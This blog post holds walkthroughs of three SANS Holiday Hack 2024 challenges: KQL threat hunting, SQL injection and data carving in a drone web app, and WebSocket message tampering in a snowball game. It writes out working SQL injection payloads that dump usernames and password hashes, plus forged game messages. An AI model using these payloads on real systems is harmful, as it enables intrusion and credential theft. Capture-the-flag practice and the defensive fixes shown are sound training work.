Monday, November 25, 2024

SANS: Holiday Hack 2024: Act 2: Microsoft KC7: Elf Conflict

Microsoft KC7: Elf Conflict

Silver

Type let's do this to begin your KQL training.

let's do this

when in doubt take 10

Employees
| take 10 

How many elves did you find? (Apparently Santa and Mrs Claus count as elves in this universe).

90

Employees
| count 

What is the name of the Chief Toy Maker?

Shinny Upatree

Employees
| where role=='Chief Toy Maker'

Type operator to continue.

operator

How many e-mails did Angel Candysalt receive? 

31

Email
| where recipient == "angel_candysalt@santaworkshopgeeseislands.org"
| count

How many distinct recipients were seen in the email logs from twinkle_frostington@santaworkshopgeeseislands.org? 

32

Email
| where sender has "twinkle_frostington@santaworkshopgeeseislands.org"
| distinct recipient
| count

How many distinct websites did Twinkle Frostington visit? 

4

To get the IP:

Employees
| where name == 'Twinkle Frostington'

Next, check the OutboundNetworkEvents

OutboundNetworkEvents
| where src_ip == "10.10.0.36"
| distinct url
| count

How many distinct domains in the PassiveDns records contain the word green? 

10

PassiveDns
| where domain contains 'green'
| distinct domain
| count

How many distinct URLs did elves with the first name Twinkle visit? 

8

let twinkle_ips =
Employees
| where name has "Twinkle"
| distinct ip_addr;
OutboundNetworkEvents 
| where src_ip in (twinkle_ips) 
| distinct url
| count

Answer 8 in KQL 101 in the badge.

Section 2: Operation Surrender - Alabaster's Espionage

Type surrender to continue:

surrender

Who was the sender of the phishing e-mail that set this plan into motion?

surrender@northpolemail.com

Email
| where subject contains "surrender"

How many elves from Team Wombley received the phishing email?

22

Email
| where subject contains "surrender"
| distinct recipient
| count

What was the filename of the document that Team Alabaster distributed in their phishing email?

Team_Wombley_Surrender.doc

Email
| where subject contains 'surrender'
| distinct link

Who was the first person from Team Wombley to click the URL in the phishing email? 

Joyelle Tinseltoe

Employees
| join kind=inner (
    OutboundNetworkEvents
) on $left.ip_addr == $right.src_ip // condition to match rows
| where url contains "Team_Wombley_Surrender.doc"
| project name, ip_addr, url, timestamp // project returns only the information you select
| sort by timestamp asc //sorts time ascending

What was the filename that was created after the .doc was downloaded and executed? 

keylogger.exe

ProcessEvents
| where timestamp between(datetime("2024-11-27T14:10:45Z") .. datetime("2024-11-27T14:12:45Z")) //you’ll need to modify this
| where hostname == "Elf-Lap-W-Tinseltoe"

Take your last answer and base64 encode it.

a2V5bG9nZ2VyLmV4ZQ==

let flag = "keylogger.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

Add a2V5bG9nZ2VyLmV4ZQ== to the Operation Silver part of the Microsoft KC7 Objective in the badge.

Silver achieved.

Gold

Section 3: Operation Snowfall - Team Wombley's Ransomware Raid

Type snowfall to begin

snowfall

What was the source IP associated with the password spray? 

59.171.58.12

AuthenticationEvents
| where result == "Failed Login"
| summarize FailedAttempts = count() by username, src_ip, result
| where FailedAttempts >= 5
| sort by FailedAttempts desc

How many unique accounts were impacted where there was a successful login from 59.171.58.12? 

23

AuthenticationEvents
| where src_ip=="59.171.58.12"
| where result=="Successful Login"
| distinct username
| count

What service was used to access these accounts/devices? 

RDP

AuthenticationEvents
| where src_ip=="59.171.58.12"
| where result=="Successful Login"
| distinct description

What file was exfiltrated on Alabaster's laptop? 

Secret_Files.zip

The attackers used RDP for the password spray at 2024-12-11T01:39:50Z and did a little recon, but they didn't exfiltrate the file until 12/16/24.

AuthenticationEvents
| where src_ip=="59.171.58.12"
| where result=="Successful Login"
| where username=="alsnowball";
Employees
| where username=="alsnowball";
ProcessEvents
| where hostname == "Elf-Lap-A-Snowball"

What is the name of the malicious file that was run on Alabaster's laptop? 

EncryptEverything.exe

ProcessEvents
| where hostname == "Elf-Lap-A-Snowball"

Create the flag:

let flag = "EncryptEverything.exe";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

Flag: RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl

Add RW5jcnlwdEV2ZXJ5dGhpbmcuZXhl to the badge under the Microsoft KC7 Objective under Operation Snowball.

Section 4: Echos in the Frost: Tracking the Unknown Threat

Type stay frosty to begin:

stay frosty

What was the timestamp of the first phishing e-mail about breached credentials for Noel Boetie?

2024-12-12T14:48:55Z

Email
| where recipient=="noel_boetie@santaworkshopgeeseislands.org"
| where subject contains "breach"

When did Noel Boetie click the link to the first file? 

2024-12-12T15:13:55Z

Email
| where recipient=="noel_boetie@santaworkshopgeeseislands.org"
| where subject contains "breach"
| distinct link;

https://holidaybargainhunt.io/published/files/files/echo.exe

Employees
| where name contains "Noel";
OutboundNetworkEvents
| where src_ip contains "10.10.0.9"

What was the IP for the domain where the file was hosted? 

182.56.23.122

PassiveDns
| where domain contains "holidaybargainhunt.io"

Let’s take a closer look at the authentication events. I wonder if there are any connection events from 182.56.23.122. If so, what hostname was accessed?

WebApp-ElvesWorkshop

AuthenticationEvents
| where src_ip=="182.56.23.122"

What was the script that was run to obtain credentials?  

Invoke-Mimikatz.ps1

The process command line shows PowerShell being used to download this script.

ProcessEvents
| where hostname=="WebApp-ElvesWorkshop"

What is the timestamp where Noel executed the file? 

2024-12-12T15:14:38Z

One of the filenames was echo.exe. Looking at the process events, that file was run at 2024-12-12T15:14:38Z.

ProcessEvents
| where hostname=="Elf-Lap-A-Boetie"

What domain was holidaycandy.hta downloaded from? 

compromisedchristmastoys.com

OutboundNetworkEvents
| where url contains "holidaycandy.hta"

What was the first file that was created after extraction? 

sqlwriter.exe

After the holidaycandy.hta file is executed, the following registry key is created.

New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force

Notice that sqlwriter.exe is referenced.

ProcessEvents
| where hostname=="Elf-Lap-A-Boetie"

What is the name of the property assigned to the new registry key? 

frosty

Again, a registry key is created.

New-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "MS SQL Writer" -Force | New-ItemProperty -Name "frosty" -Value "C:\Windows\Tasks\sqlwriter.exe" -PropertyType String -Force

The name is frosty.

ProcessEvents
| where hostname=="Elf-Lap-A-Boetie"

Create the flag:

let flag = "frosty";
let base64_encoded = base64_encode_tostring(flag);
print base64_encoded

The flag is: ZnJvc3R5

Add ZnJvc3R5 to the Echos in the Frost part of the Microsoft KC7 Objective in the badge.

Gold Achieved.


SANS: Holiday Hack 2024: Act 2: Drone Path Terminal

Drone Path

Silver

This terminal is near Chimney Scissorsticks in the game.

Hey. Psst, over here. Hey, I'm Chimney Scissorsticks.

I'm not liking all the tension brewing between the factions, so even though I agreed with how Wombley was handling things, I get the feeling this is going to end poorly for everyone. So I'm trying to get this data to Alabaster's side. Can you help?

Wombley's planning something BIG in that toy factory. He's not really making toys in there. He's building an armada of drones!

They're packed with valuable data from the elves working on the project. I think they hide the admin password in the drone flight logs. We need to crack this to prevent this escalating snowball showdown.

You'll be working with KML files, tracking drone flight paths. Intriguing, right? We need every detail to prepare for what’s ahead!

Use tools like Google Earth and some Python scripting to decode the hidden passwords and codewords locked in those files.

Ready to give it a go? It’s going to be a wild ride, and your skills might just turn the tide of this conflict!

The Elf Drone Workshop Terminal goes here: Elf Drone Workshop

When first accessing the Terminal:

Welcome to the Elf Drone Workshop!  Upload your drone logs for other analysts to analyze!  Our elves are working around the clock to get toys ready for Santa's sleigh.  Only verified pilots have access to the logs so remember to authenticate yourself.  

There's a drop-down Menu at the top right.  This menu has the following options: Login, FileShare, and Home.  

If the browser window is minimized, the navigation is slightly different: after clicking the 3 lines menu at the top right, there's a dropdown Menu that appears on the left instead.  

Go to the FileShare menu option and download the file.  

Many challenges have a SQL injection component.

Select the Login option and try Username: ' OR 1=1 -- and Password: abc

The site appears to be vulnerable to SQL injection, because the injection above causes a successful login. The menu options changed: now they are Home, FileShare, Workshop, Profile, Admin Console, and Logout. Check to see if there are other files available in the file share. There aren't. Look at the Profile menu option. Nothing interesting there. Admin Console requires a code.

The Workshop page looks more interesting. It is titled "Elf Drone Workshop: Search for a Drone" and has a textbox with a Search button; below that it displays "Drone Details". Since it's the same developer that made the login screen, it could potentially be vulnerable to SQL injection as well. Enter ' OR 1=1 -- in the search bar. It outputs the following.

  • Name: ELF-HAWK, Quantity: 40, Weapons: Snowball-launcher
  • Name: Pigeon-Lookalike-v4, Quantity: 20, Weapons: Surveillance Camera
  • Name: FlyingZoomer, Quantity: 4, Weapons: Snowball-Dropper
  • Name: Zapper, Quantity: 5, Weapons: CarrotSpike

Comments for Zapper

  • This is sort of primitive, but it works!

Looking at the traffic, the search sends its request to this URL:
https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=%27%20OR%201=1

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1

What if we change the query?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 1 -- 

The output is: []

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 2 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 3 -- 

Same output

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 ORDER BY 4 -- 

Error Message

ORDER BY 1 through 3 run without error and ORDER BY 4 fails, so the query returns three columns.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1=1 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    },
    {
        "name": "ELF-HAWK",
        "quantity": "40",
        "weapons": "Snowball-launcher"
    },
    {
        "name": "FlyingZoomer",
        "quantity": "4",
        "weapons": "Snowball-Dropper"
    },
    {
        "name": "Pigeon-Lookalike-v4",
        "quantity": "20",
        "weapons": "Surveillance Camera"
    },
    {
        "name": "Zapper",
        "quantity": "5",
        "weapons": "CarrotSpike"
    }
]

Get rid of extra output we don't need.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null -- 

Output:

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Is there a users table?  Notice there is no space between users and the --.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,null,null from users-- 

This output means there is a users table.  If there weren't, an error would be returned.

[
    {
        "name": null,
        "quantity": null,
        "weapons": null
    }
]

Testing to see what can be added to each field.

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT 1,null,null from users-- 

[
    {
        "name": 1,
        "quantity": null,
        "weapons": null
    }
]

1 is allowed in the first field.  Will it accept a username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT username,null,null from users-- 

Error message, so no, it won't allow username.

What about the second field?  Will it allow username field?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,username,null from users--

Yup.

[
    {
        "name": 1,
        "quantity": "brynne",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "filo",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "fritjolf",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "lira",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "pip",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "sprigg",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "tylwen",
        "weapons": null
    }
]

What about passwords?

https://hhc24-dronepath.holidayhackchallenge.com/api/v1.0/drones?drone=' OR 1= 0 UNION SELECT null,password,null from users--

Yes it will. >:)

[
    {
        "name": 1,
        "quantity": "2bb7ab7713cc012f02eb03c95f6e4443",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "2fd03c8ea542a7fd85ca4ebbcc13d5ca",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "3c3a4f722ec77c1712941003443a4d83",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "4f7f1b7c49fa2b0cc22e2d2599f1f2e5",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "9eb6c13b1b18bc785ffb84d977bf5499",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "b9af6f935826ae1a89ecba72476fbcba",
        "weapons": null
    },
    {
        "name": 1,
        "quantity": "e54efff9e6258bef3eb35f093e3bae00",
        "weapons": null
    }
]

Looking at the hashes, only two show up as being cracked in online crackers: GUMDROP1 and RumbleInTheJungle.

Trying those passwords for the users:

fritjolf: GUMDROP1
pip: RumbleInTheJungle
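
Why the ' OR 1=1 -- and UNION SELECT inputs above work, and what the fix looks like, as an added example (not the challenge's code). The sqlite3 engine, the table layout, the sample rows and the function names are assumptions made for the illustration; only the two payloads come from this write-up.

```python
import sqlite3

# Payloads quoted from the write-up above.
PAGE_PAYLOADS = [
    "' OR 1=1 -- ",
    "' OR 1= 0 UNION SELECT null,username,null from users--",
]


def build_db():
    """Constructed stand-in for the Workshop backend (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE drones (name TEXT, quantity TEXT, weapons TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO drones VALUES ('ELF-HAWK', '40', 'Snowball-launcher');
        INSERT INTO drones VALUES ('Zapper', '5', 'CarrotSpike');
        INSERT INTO users VALUES ('sample_user', 'constructed-hash-value');
        """
    )
    return db


def search_vulnerable(db, drone):
    # The input is pasted into the SQL text, so a quote in `drone` closes the
    # string literal and whatever follows is parsed as SQL.
    sql = "SELECT name, quantity, weapons FROM drones WHERE name = '" + drone + "'"
    return db.execute(sql).fetchall()


def search_parameterized(db, drone):
    # The value is bound separately from the SQL text and is only ever
    # compared as data, whatever characters it contains.
    sql = "SELECT name, quantity, weapons FROM drones WHERE name = ?"
    return db.execute(sql, (drone,)).fetchall()


def compare(db, payloads=PAGE_PAYLOADS):
    """Return (payload, vulnerable_rows, parameterized_rows) per payload."""
    return [
        (p, search_vulnerable(db, p), search_parameterized(db, p))
        for p in payloads
    ]


if __name__ == "__main__":
    for payload, leaked, safe in compare(build_db()):
        print(repr(payload))
        print("  concatenated :", leaked)
        print("  parameterized:", safe)
```

With the bound parameter, both inputs are treated as a drone name that does not exist, so the search returns nothing and the users table is never reachable from this query.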

Alternatively, the file in the file share can be downloaded and opened in Google Earth.  The flight path of that KML file spells out GUMDROP1.

Login as fritjolf - the file share still shows the same file.  However, in this profile there's a different file.

Note to self, remember drone name, it is the same location as secret snowball warehouses /files/secret/Preparations-drone-name.csv

Go to https://hhc24-dronepath.holidayhackchallenge.com/files/secret/Preparations-drone-name.csv

Download the file. (I already knew the name given that through the SQL injection, the drone name is called Elf-Hawk.  I downloaded that file already.  I didn't know that that's what this was alluding to though because I didn't follow the intended path to solve this one.)

Import the Preparations-drone-name.csv file into Google Earth.  Google Earth has a nice wizard that assists with importing it.  The file is delimited by commas and the encoding is UTF-8; check the rows/columns at the bottom to make sure they look OK.  Click Next.

Then tell it the latitude and longitude which are the OSD.latitude and OSD.longitude respectively.  Click Finish.  It will ask if a template should be applied.  Click No.

This will load the data in.  On the left-hand side under Temporary Places, it will display Preparations-drone-name.csv.  Check the box next to it, and the points will show up on the globe.

At first, there doesn't seem to be a discernible pattern.  However, clicking on each point in the left-hand navigation bar and looking at the landmarks shows letters.  For example, at the first point there are trees that look like the letter E.  At the second point there are trees or bushes that look like the letter L.  Keep looking at all the points, and eventually they spell out "ELF-HAWK".

Try the same SQL Injection on the Workshop page - just in case fritjolf could see different things.  Logged into pip and looked at their pages as well.  Neither one of them had access to the AdminConsole without a code.

Look at the comments for all the drones.  The important comments seem to be:

Comments for Pigeon-Lookalike-v4
This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Drone Details
These drones will work great to find Alabasters snowball warehouses. I have hid the activation code in the dataset ELF-HAWK-dump.csv. We need to keep it safe, for now it's under /files/secret.
We need to make sure we have enough of these drones ready for the upcoming operation. Well done on hiding the activation code in the dataset. If anyone finds it, it will take them a LONG time or forever to carve the data out, preferably the LATTER.

Open up ELF-HAWK-dump.csv in Google Earth Pro.  Unfortunately, on a globe, it doesn't really make much sense.  The hint about LONG and LATTER seems to refer to longitude and latitude.  Maybe mapping those on a 2D plane would work?  

There's a tool for studying Geographic Information called QGIS on Windows.  https://www.qgis.org/download/

In QGIS, go to Layer>Add Layer>Add Delimited Text Layer.  In the File Name, add the csv.  Encoding should be UTF-8.  In the File format, make sure the CSV radio button is set.  In Geometry Coordinates, make sure that the Point Coordinates are set to what they should be: Latitude: OSD Latitude and Longitude: OSD Longitude.  Geometry CRS should be set to Project CRS: EPSG:4326 - WGS 84.  Click Add.

Immediately after Add is clicked, a phrase appears: DroneDataAnalystExpertMedal.



Add this word to the badge for the Drone Path Terminal.

Silver Medal Achieved.

Gold

The path to the gold medal was given in the comments for the drones.

Comments for Pigeon-Lookalike-v4

This is a great drone for surveillance, but we need to keep it out of the rain.
I cant believe we are using pigeons for surveillance. If anyone finds out, there will most likely be a conspiracy theory about it.
I heard a rumor that there is something fishing with some of the files. There was some talk about only TRUE carvers would find secrets and that FALSE ones would never find it.

Looking at the data in the ELF-HAWK-dump.csv, there are a lot of fields with TRUE and FALSE.  The comment mentions 'carvers'.  This likely indicates carving out the TRUE/FALSE data.  When thinking of TRUE/FALSE, 1/0 comes to mind, which is associated with binary.  That means there's binary data hidden in the csv.

Uploading the csv to CyberChef, it's possible to use CyberChef to carve out this data.  The recipe is the following:

https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','TRUE%7CFALSE',true,true,false,true,false,false,'List%20matches')Remove_whitespace(true,true,true,true,true,true)Find_/_Replace(%7B'option':'Regex','string':'TRUE'%7D,'1',true,true,false,false)Find_/_Replace(%7B'option':'Regex','string':'FALSE'%7D,'0',true,true,false,false)Remove_whitespace(true,true,true,true,true,false)From_Binary('Space',8)

Upload the ELF-HAWK-dump.csv file into CyberChef as input with that recipe.

Once that is done, the output is an ASCII art picture of a drone and the words CODEWORD=EXPERTTURKEYCARVERMEDAL.
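
The same carve in Python, as an added example that is not part of the original write-up. It follows the recipe's steps (list every TRUE/FALSE token in file order, map them to 1/0, decode 8 bits per byte); the sample CSV, its flag_a..flag_d column names and the CODEWORD=SAMPLE message are constructed for the demonstration.

```python
import re


def carve_bits(csv_text):
    """Return every TRUE/FALSE token in the file, in order, as a '1'/'0' string."""
    tokens = re.findall(r"TRUE|FALSE", csv_text)
    return "".join("1" if token == "TRUE" else "0" for token in tokens)


def bits_to_text(bits):
    """Decode a bit string 8 bits at a time; leftover bits at the end are dropped."""
    usable = len(bits) - len(bits) % 8
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
    # latin-1 maps every byte to a character, so unexpected bytes stay visible
    # instead of raising a decode error.
    return data.decode("latin-1")


def make_sample_csv(message):
    """Build a constructed telemetry CSV that hides `message` in its boolean columns.

    Four boolean columns per row, so every two rows carry one byte. The numeric
    columns are filler and contribute nothing to the carve.
    """
    bits = "".join(f"{byte:08b}" for byte in message.encode("ascii"))
    lines = ["OSD.latitude,OSD.longitude,flag_a,flag_b,flag_c,flag_d"]
    for row, start in enumerate(range(0, len(bits), 4)):
        flags = ["TRUE" if b == "1" else "FALSE" for b in bits[start:start + 4]]
        coords = [f"{10 + row * 0.01:.2f}", f"{20 + row * 0.01:.2f}"]
        lines.append(",".join(coords + flags))
    return "\n".join(lines) + "\n"


def carve(csv_text):
    """Full pipeline: CSV text in, hidden text out."""
    return bits_to_text(carve_bits(csv_text))


if __name__ == "__main__":
    sample = make_sample_csv("CODEWORD=SAMPLE")  # constructed input
    print(sample.splitlines()[1])
    print(carve(sample))
    # For the real file: carve(open("ELF-HAWK-dump.csv", encoding="utf-8").read())
```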


Add this phrase to the badge for the Drone Path Terminal.

Gold Medal Achieved.

SANS: Holiday Hack 2024: Act 2: Snowball Showdown

Snowball Showdown

Silver Medal

This challenge is in Act 2, The Front Yard, near Dusty Giftwrap.  

Hi there! I'm Dusty Giftwrap, back from the battlefield! I'm mostly here for the snowball fights!

But I also don't want Santa angry at us, you wouldn't like him when he's angry. His face becomes as red as his hat! So I guess I'm rooting for Alabaster.

Alabaster Snowball seems to be having quite a pickle with Wombley Cube. We need your wizardry.

Take down Wombley the usual way with a friend, or try a different strategy by tweaking client-side values for an extra edge.

Alternatively, we've got a secret weapon - a giant snow bomb - but we can't remember where we put it or how to launch it.

Adjust the right elements and victory for Alabaster can be secured with more subtlety. Intriguing, right?

Raring to go? Terrific! Here's a real brain tickler. Navigator of chaos or maestro of subtlety, which will you be? Either way, remember our objective: bring victory to Alabaster.

Confidence! Wit! We've got what it takes. Team up with a friend or find a way to go solo - no matter how, let's end this conflict and take down Wombley!


Click on the "We Want You" sign to see the game.  It's a snowball fight.  The goal is to hit Wombley more times than he hits Alabaster Snowball.

https://hhc24-snowballshowdown.holidayhackchallenge.com/?&challenge=termSnowballShowdown

This game can either be played with friends or alone.  When the game is first launched, it's in multi-player mode.  Clicking on Join a private room brings up more source code.  Keep in mind, viewing information in different browser tools may make the source code look different.

In Chrome, under Sources, there's a page that has: game.html?username=<Your user name>&roomId=<your room time>&roomType=private&id=<your id>… as the file name.

It shows this source regarding single player mode:

var singlePlayer = "false"

    function checkAndUpdateSinglePlayer() {
      const localStorageValue = localStorage.getItem('singlePlayer');
      if (localStorageValue === 'true' || localStorageValue === 'false') {
        singlePlayer = String(localStorageValue === 'true');
      }
      const urlParams = new URLSearchParams(window.location.search);
      const urlValue = urlParams.get('singlePlayer');
      if (urlValue === 'true' || urlValue === 'false') {
        singlePlayer = String(urlValue === 'true');
      }
    }

It looks like singlePlayer mode can be set in the url like this:

https://hhc24-snowballshowdown.holidayhackchallenge.com/game.html?username=<Your Player Name>&roomId=<room id that was created>&roomType=private&singlePlayer=true

Good, now it can be tinkered around with without waiting for other players or disturbing them.

In the source, phaser-snowball-game.js, there are many parameters that can be tinkered with to give the player the advantage.

hhc24-snowballshowdown.holidayhackchallenge.com/js/phaser-snowball-game.js

Chrome or Firefox Developer Tools, or Burp could be useful for this challenge.  Overrides can be defined in Chrome or Firefox to load the local copy of a source instead of a remote copy.  That local copy can be manipulated.

Example:

Imagine changing the amount of time the elves are incapacitated (i.e., frozen), changing the blast radius so that snowballs hit larger areas, manipulating throw speed and rate, etc.

Unfortunately, only manipulating the settings in this script doesn't seem to earn silver.

Watching the traffic in flight and manipulating web socket traffic seemed to do the trick.

The screen shows a HACKER DETECTED message when the player is doing something that will cause a win condition for silver.

mainScene.ws.sendMessage({"type":"snowballp","x":525,"y":918.5343627929688,"owner":"<player id generated in game>","isWomb":false,"blastRadius":200,"velocityX":957.5500105745144,"velocityY":-142.96013007093308,"id":285})

This changes the player's blast radius from 24 to 200, which can be useful if the player keeps aiming at the same spot on the screen (i.e., has the line on top of where Wombley could be).  Changing phaser-snowball-game.js to have non-healing terrain and aiming straight for Wombley while repeatedly sending the WebSocket message above tends to do an OK job of helping the elves win.

this.healingTerrain = true; to this.healingTerrain = false;

There are likely more efficient or elegant ways to win, but it was enough to get a silver medal.

Gold Medal

Gold was considerably easier to get.  Dusty Giftwrap mentions finding a weapon.

Alternatively, we've got a secret weapon - a giant snow bomb - but we can't remember where we put it or how to launch it.

Searching the source code for "bomb" turns up many references to the bomb.  Considering we used WebSockets to get silver, it's a safe bet to look in the WebSocket source.  In reconnecting-socket.min.js, there are a few references to bomber that look interesting, like this one:

mainScene.bomberContainer = mainScene.add.container(400, 300),

What's happening above this?

It talks about a moasb.  How do we call this?

Looking at other references, it says this:

mainScene.ws.sendMessage({type: 'moasb', launch_code: '85e8e9729e2437c9d7d6addca68abb9f'})

However, running this alone doesn't seem to be enough to get gold, but it does give an idea of format.

mainScene.ws.sendMessage({type:'moasb'})

It doesn't seem to matter if it's called in correctly - the bomber is still spawned in, which causes 999 hits against Wombley and automatically wins the game.
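
What the server side would need to check for the silver and gold paths above to fail, as an added example (not the game's code). The message shapes are the ones quoted in this write-up; the Python server, the function name, the session player id and the launch-code value are assumptions.

```python
import hmac

SERVER_BLAST_RADIUS = 24  # the default this write-up observed before tampering
ALLOWED_TYPES = {"snowballp", "moasb"}


def _is_number(value):
    # bool is a subclass of int in Python, so exclude it explicitly.
    return isinstance(value, (int, float)) and not isinstance(value, bool)


def validate_message(msg, session_player_id, server_launch_code):
    """Decide what the server does with one client WebSocket message.

    Returns (accepted, reason, message_to_apply).
    """
    kind = msg.get("type")
    if kind not in ALLOWED_TYPES:
        return False, "unknown message type", None

    if kind == "snowballp":
        # Identity comes from the authenticated session, not from the payload.
        if msg.get("owner") != session_player_id:
            return False, "owner does not match session", None
        fields = ("x", "y", "velocityX", "velocityY")
        if not all(_is_number(msg.get(name)) for name in fields):
            return False, "malformed coordinates", None
        applied = dict(msg)
        # Gameplay constants are server-owned: the client's value is discarded.
        applied["blastRadius"] = SERVER_BLAST_RADIUS
        return True, "ok", applied

    # kind == "moasb": the privileged action requires the secret, compared in
    # constant time so the check does not leak how many characters matched.
    supplied = msg.get("launch_code")
    if not isinstance(supplied, str) or not hmac.compare_digest(
        supplied.encode(), server_launch_code.encode()
    ):
        return False, "missing or wrong launch_code", None
    return True, "ok", {"type": "moasb"}


if __name__ == "__main__":
    code = "constructed-launch-code"  # constructed value, held only by the server
    tampered = {"type": "snowballp", "x": 525, "y": 918.5, "owner": "player-1",
                "isWomb": False, "blastRadius": 200,
                "velocityX": 957.5, "velocityY": -142.9, "id": 285}
    print(validate_message(tampered, "player-1", code))
    print(validate_message({"type": "moasb"}, "player-1", code))
```

A launch code that ships in the client's JavaScript, as the one quoted above does, is not a secret, so this check only helps if the value is kept server-side and issued to authorized players.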

Gold Medal Achieved.